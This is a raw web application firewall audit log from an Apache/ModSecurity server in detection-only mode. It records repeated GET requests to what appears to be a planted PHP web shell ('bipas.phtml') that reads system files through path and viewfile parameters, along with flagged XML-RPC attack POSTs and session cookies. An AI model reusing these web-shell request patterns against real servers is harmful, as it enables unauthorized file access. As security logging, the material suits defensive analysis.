[severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC021JfblPUQiSn5r2YigAAAAA"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/thread-self/root/etc/init.d/irqbalance"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC021JfblPUQiSn5r2YigAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1750119643856649 4400 (- - -) Stopwatch2: 1750119643856649 4400; combined=2426, p1=345, p2=1926, p3=39, p4=30, p5=86, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e39a1f5e-Z-- --86ae9d0a-A-- [17/Jun/2025:05:50:46.286293 +0530] aFC03dyZ4SMykfn97vy-ZwAAAAs 146.190.105.35 37310 127.0.0.1 7081 --86ae9d0a-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 491 Cookie: PHPSESSID=occkfvbmou5fkddq9vqiq160ec; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_bda6a99f65e026231e008f2383592f%7C%7C1750292444%7C%7C1750288844%7C%7C6e96afe631ac52eb8b49d9bb379298db; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=c202eda9c867b913dd84a85a007bc970%7C%7C1750292444%7C%7C1750288844%7C%7C373b68bbe1237ee854a8f290ef1852a7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --86ae9d0a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=7hhjj8gmcpifeamju1tb78tg28; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_e48bb2d60f599589d62f88d04c984a%7C%7C1750292446%7C%7C1750288846%7C%7Cdedf69b80f4251f2576e51999972f274; expires=Thu, 19 Jun 2025 00:20:46 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=a0454615fd49890886a800194a759b37%7C%7C1750292446%7C%7C1750288846%7C%7C72de22ac4ad537a2e9bffb8247f08046; expires=Thu, 19 Jun 2025 00:20:46 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --86ae9d0a-E-- --86ae9d0a-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (44+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (44+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFC03dyZ4SMykfn97vy-ZwAAAAs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750119645198993 1087387 (- - -) Stopwatch2: 1750119645198993 1087387; combined=3237, p1=408, p2=2404, p3=107, p4=35, p5=178, sr=100, sw=105, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --86ae9d0a-Z-- --d8d13b24-A-- [17/Jun/2025:05:50:52.253018 +0530] aFC05NyZ4SMykfn97vy-cAAAAAs 216.73.216.240 33520 127.0.0.1 7081 --d8d13b24-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Finit.d%2Fufw HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --d8d13b24-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3645 Connection: close Content-Type: text/html; charset=UTF-8 --d8d13b24-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/thread-self/root/etc/init.d/ufw"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC05NyZ4SMykfn97vy-cAAAAAs"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/thread-self/root/etc/init.d/ufw"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC05NyZ4SMykfn97vy-cAAAAAs"] Apache-Handler: application/x-httpd-php Stopwatch: 1750119652248080 5013 (- - -) Stopwatch2: 1750119652248080 5013; combined=2774, p1=447, p2=2120, p3=50, p4=38, p5=119, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d8d13b24-Z-- --3519235e-A-- [17/Jun/2025:05:51:46.147227 +0530] aFC1GVJfblPUQiSn5r2YwgAAAAA 146.190.105.35 58790 127.0.0.1 7081 --3519235e-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 488 Cookie: PHPSESSID=b283n4nenrr2cd3bq7rutsrf3m; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_6d4faffde15f403e18192a76e572e3%7C%7C1750292504%7C%7C1750288904%7C%7C42045749f5022550335aa07a3a671575; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=86d936a94249ce472cd77afde69e08dc%7C%7C1750292504%7C%7C1750288904%7C%7Cce8fde4b155b4d768a941bf7d205238d User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --3519235e-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=o9kco15sern3bllt9jhaid4i84; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_0ac774ce74ba5d89023b2c5be0f99e%7C%7C1750292505%7C%7C1750288905%7C%7Cc099873a98239c3a3f112bc1aaa0654c; expires=Thu, 19 Jun 2025 00:21:45 GMT; Max-Age=172799; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=d3e448174d15d8f3b668223e603ed0dd%7C%7C1750292506%7C%7C1750288906%7C%7Cfd9e2f0f591b9433e9762dff569767b2; expires=Thu, 19 Jun 2025 00:21:46 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --3519235e-E-- --3519235e-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFC1GVJfblPUQiSn5r2YwgAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750119705093527 1053790 (- - -) Stopwatch2: 1750119705093527 1053790; combined=3882, p1=486, p2=3003, p3=101, p4=40, p5=157, sr=126, sw=95, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3519235e-Z-- --582e9c31-A-- [17/Jun/2025:05:52:08.469973 +0530] aFC1MIoVQnPDyHnl9oPa1QAAAAY 50.16.216.166 43318 127.0.0.1 7081 --582e9c31-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/apt/apt.conf.d&viewfile=//etc/apt/apt.conf.d/01-vendor-ubuntu HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 50.16.216.166 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --582e9c31-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3035 Connection: close Content-Type: text/html; charset=UTF-8 --582e9c31-H-- Message: Warning. Matched phrase "etc/apt/apt.conf" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apt/apt.conf found within ARGS:path: /etc/apt/apt.conf.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/apt/apt.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apt/apt.conf found within ARGS:viewfile: /etc/apt/apt.conf.d/01-vendor-ubuntu"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/apt/apt.conf" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apt/apt.conf found within ARGS:path: /etc/apt/apt.conf.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC1MIoVQnPDyHnl9oPa1QAAAAY"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/apt/apt.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apt/apt.conf found within ARGS:viewfile: /etc/apt/apt.conf.d/01-vendor-ubuntu"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC1MIoVQnPDyHnl9oPa1QAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1750119728465375 4669 (- - -) Stopwatch2: 1750119728465375 4669; combined=2557, p1=390, p2=1977, p3=42, p4=43, p5=105, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --582e9c31-Z-- --9667ac3e-A-- [17/Jun/2025:05:52:23.542956 +0530] aFC1P2j9J38fG6WAr4pfWgAAAAk 216.73.216.240 44286 127.0.0.1 7081 --9667ac3e-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Finit.d%2Fnamed HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --9667ac3e-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4355 Connection: close Content-Type: text/html; charset=UTF-8 --9667ac3e-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/thread-self/root/etc/init.d/named"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC1P2j9J38fG6WAr4pfWgAAAAk"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/thread-self/root/etc/init.d/named"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC1P2j9J38fG6WAr4pfWgAAAAk"] Apache-Handler: application/x-httpd-php Stopwatch: 1750119743538643 4368 (- - -) Stopwatch2: 1750119743538643 4368; combined=2366, p1=374, p2=1836, p3=39, p4=31, p5=86, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9667ac3e-Z-- --d4507148-A-- [17/Jun/2025:05:52:46.290581 +0530] aFC1VRXnhE9cEv89BPm8rwAAAAc 146.190.105.35 49648 127.0.0.1 7081 --d4507148-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 488 Cookie: PHPSESSID=hnonadvonqjkevmft6pbbhnpm1; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_de455651800277b72a0085209d336e%7C%7C1750292564%7C%7C1750288964%7C%7C6bbaf415acd0490adcffd51568603f89; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=7b6e5f880aa51fea55c28e09825f7c57%7C%7C1750292564%7C%7C1750288964%7C%7C9e8d7412083f0d58ab0d742753681b8d User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --d4507148-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=9ucam626vmp9cdkpcaji1dl7d6; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_410fd61b33b7a9cf3d6e58caae6703%7C%7C1750292566%7C%7C1750288966%7C%7Cdbd2688400b2343d4261cef0b26cbb7d; expires=Thu, 19 Jun 2025 00:22:46 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=5528d860f49cf3f8838ac11dab3aa875%7C%7C1750292566%7C%7C1750288966%7C%7C6c3340445d68aee0a911c3337eebc382; expires=Thu, 19 Jun 2025 00:22:46 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --d4507148-E-- --d4507148-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFC1VRXnhE9cEv89BPm8rwAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750119765221353 1069310 (- - -) Stopwatch2: 1750119765221353 1069310; combined=2959, p1=381, p2=2122, p3=113, p4=41, p5=187, sr=95, sw=115, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d4507148-Z-- --782f7f1f-A-- [17/Jun/2025:05:53:00.703147 +0530] aFC1ZFJfblPUQiSn5r2Y-AAAAAA 44.208.223.68 42332 127.0.0.1 7081 --782f7f1f-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/apt/apt.conf.d&viewfile=//etc/apt/apt.conf.d/20snapd.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 44.208.223.68 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --782f7f1f-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3061 Connection: close Content-Type: text/html; charset=UTF-8 --782f7f1f-H-- Message: Warning. Matched phrase "etc/apt/apt.conf" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apt/apt.conf found within ARGS:path: /etc/apt/apt.conf.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/apt/apt.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apt/apt.conf found within ARGS:viewfile: /etc/apt/apt.conf.d/20snapd.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/apt/apt.conf" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apt/apt.conf found within ARGS:path: /etc/apt/apt.conf.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC1ZFJfblPUQiSn5r2Y-AAAAAA"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/apt/apt.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apt/apt.conf found within ARGS:viewfile: /etc/apt/apt.conf.d/20snapd.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC1ZFJfblPUQiSn5r2Y-AAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1750119780699223 3978 (- - -) Stopwatch2: 1750119780699223 3978; combined=2184, p1=338, p2=1693, p3=36, p4=33, p5=84, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --782f7f1f-Z-- --b40d7047-A-- [17/Jun/2025:05:53:06.675192 +0530] aFC1ahXnhE9cEv89BPm8vwAAAAc 216.73.216.240 43074 127.0.0.1 7081 --b40d7047-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2Fcurrent%2Fetc%2Fskel&viewfile=%2F%2Fsnap%2Fcore20%2Fcurrent%2Fetc%2Fskel%2F.profile HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --b40d7047-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3371 Connection: close Content-Type: text/html; charset=UTF-8 --b40d7047-H-- Message: Warning. Matched phrase ".profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: .profile found within ARGS:viewfile: /snap/core20/current/etc/skel/.profile"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: .profile found within ARGS:viewfile: /snap/core20/current/etc/skel/.profile"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC1ahXnhE9cEv89BPm8vwAAAAc"] Apache-Handler: application/x-httpd-php Stopwatch: 1750119786670305 4951 (- - -) Stopwatch2: 1750119786670305 4951; combined=2728, p1=459, p2=2131, p3=42, p4=41, p5=54, sr=121, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b40d7047-Z-- --2406a713-A-- [17/Jun/2025:05:53:09.042112 +0530] aFC1bdyZ4SMykfn97vy-3AAAAAs 216.73.216.240 43350 127.0.0.1 7081 --2406a713-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Finit.d%2Fkmod HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --2406a713-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3870 Connection: close Content-Type: text/html; charset=UTF-8 --2406a713-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/thread-self/root/etc/init.d/kmod"] [severity "CRITICAL"] 